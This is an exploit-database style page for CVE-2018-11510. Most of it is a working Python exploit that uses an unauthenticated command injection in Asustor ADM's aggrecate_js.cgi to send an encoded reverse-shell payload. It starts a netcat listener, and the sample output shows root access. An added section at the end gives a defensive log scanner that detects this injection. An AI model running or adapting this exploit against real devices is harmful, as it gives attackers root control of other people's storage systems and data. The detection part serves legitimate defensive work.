ADM 3.1.2RHG1 - Remote Code Execution
Source: @haqur  Author: Fulton  Published: 2018-08-27
# Title: Asustor ADM 3.1.2RHG1 - Remote Code Execution
# Author: Matthew Fulton & Kyle Lovett
# Date: 2018-07-01
# Vendor Homepage: https://www.asustor.com/
# Software Link: http://download.asustor.com/download/adm/X64_G3_3.1.2.RHG1.img
# Version: <= ADM 3.1.2RHG1
# Tested on: ASUSTOR AS6202T
# CVE : CVE-2018-11510
# References:
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
 
#!/usr/bin/python
 
"""
CVE-2018-11510: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11510
This exploit takes advantage of an unauthenticated os command injection discovered by Kyle Lovett
if exploitation occurs successfully, a root shell is granted
Authors: matthew fulton and Kyle Lovett
Date: 27 May 2018
Background: Both Kyle and I found a number of vulnerabilities that we had independently reported
to Asustor that Asustor hasn't acknowledged nor apparently fixed.
After a twitter communication Kyle was kind enough to share a few details
exploit created on MacOS system, python 2.7.10, may port to metasploit module soon
Vendor link: https://www.asustor.com
 
Matthews-MBP:remoteunauth matt$ python admex.py -t 192.168.1.82
exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)
starting netcat listener on port 1234
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # uname -a;id
/bin/sh: can't access tty; job control turned off
/volume0/usr/builtin/webman/portal/apis # Linux AS6202T-961F 4.4.24 #1 SMP Mon Mar 26 02:57:14 CST 2018 x86_64 GNU/Linux
uid=0(root) gid=0(root) groups=0(root)
"""
 
import sys, threading, time, os, subprocess
import urllib2
import ssl
import argparse
 
 
class exploit(object):
    def __init__(self,interval=1):
        self.target = args.target
        self.rport = args.port
        self.lport = args.lport
        self.remote = args.remote
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.daemon = True
        thread.start()
 
    def run(self):
        #ignore ssl warnings
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        while True:
            try:
                turl="https://"+self.target+":"+self.rport+"/portal/apis/aggrecate_js.cgi?script=" \
                "launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket" \
                "(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%22"+self.remote+"%22%2C"+self.lport+"))" \
                "%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3D" \
                "subprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22"
                response=urllib2.urlopen(turl,context=ctx)
                time.sleep(self.interval)
            except urllib2.URLError as e:
                print "Something is wrong:|"
                print e
                os._exit(1)
 
def revShell():
    print "starting netcat listener on port "+args.lport
    cmd = "nc -lv {0}".format(args.lport)
    os.system(cmd)
 
def main():
    print """exploit for an unauthenticated OS command injection vulnerability that effects
Asustor ADM 3.1.2.RHG1 and below, leads to complete compromise
authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
    goexploit = exploit()
    revShell()
 
if __name__ == '__main__':
    Help = """exploitation of an OS command injection bug that affects Asustor ADM, leads to complete compromise
    authors: Matthew Fulton (@haqur) & Kyle Lovett (@SquirrelBuddha)"""
    # pass the Help string defined above, not the builtin help()
    parser=argparse.ArgumentParser(description=Help)
    parser.add_argument('--target', '-t', default="192.168.1.82", help="Target IP", required=True)
    parser.add_argument('--port', '-p', default="8001")
    parser.add_argument('--lport', '-l', default="1234")
    parser.add_argument('--remote','-r', default="192.168.1.253")
    args = parser.parse_args()
    main()
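
Detection note (an added example, not part of the original exploit or written by its authors): the script above injects through the `script` parameter of `aggrecate_js.cgi`, so a defender can scan web access logs for requests to that CGI whose decoded `script` value is anything other than a plain name. The combined log format, the allowlist of characters and the sample log lines are assumptions constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote

# CGI name and parameter taken from the exploit URL on this page.
CGI_NAME = "/aggrecate_js.cgi"
PARAM = "script"

# Assumption: legitimate values are plain script names such as "launcher".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.,-]+")

# Assumption: combined-format access log: ip - - [ts] "METHOD target PROTO" ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*"')

# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Aug/2018:10:00:01 +0000] "GET /portal/apis/aggrecate_js.cgi?script=launcher HTTP/1.1" 200 5120',
    '198.51.100.7 - - [27/Aug/2018:10:00:05 +0000] "GET /portal/apis/aggrecate_js.cgi?script=launcher%22%26id%22 HTTP/1.1" 200 0',
    '198.51.100.7 - - [27/Aug/2018:10:00:09 +0000] "GET /portal/apis/aggrecate_js.cgi?script=launcher%2522 HTTP/1.1" 200 0',
    '192.0.2.10 - - [27/Aug/2018:10:00:12 +0000] "GET /portal/index.cgi?script=a%22b HTTP/1.1" 200 812',
]

def suspicious_values(target):
    """Return decoded `script` values that fall outside the allowlist."""
    path, _, query = target.partition("?")
    if not unquote(path).endswith(CGI_NAME):
        return []
    # parse_qs splits on raw '&' first, then percent-decodes each value once,
    # so an encoded %26 stays inside the value and a double-encoded %2522
    # decodes to "%22", which the allowlist still rejects.
    values = parse_qs(query).get(PARAM, [])
    return [v for v in values if not SAFE_VALUE.fullmatch(v)]

def scan(lines):
    """Return (ip, timestamp, decoded_value) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue  # not a request line in the assumed format
        for value in suspicious_values(m.group("target")):
            hits.append((m.group("ip"), m.group("ts"), value))
    return hits

if __name__ == "__main__":
    for ip, ts, value in scan(SAMPLE_LOG):
        print(f"{ts} {ip} script={value!r}")
```

The same allowlist check, applied server-side before the value reaches a shell, is the corresponding input-validation control.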
 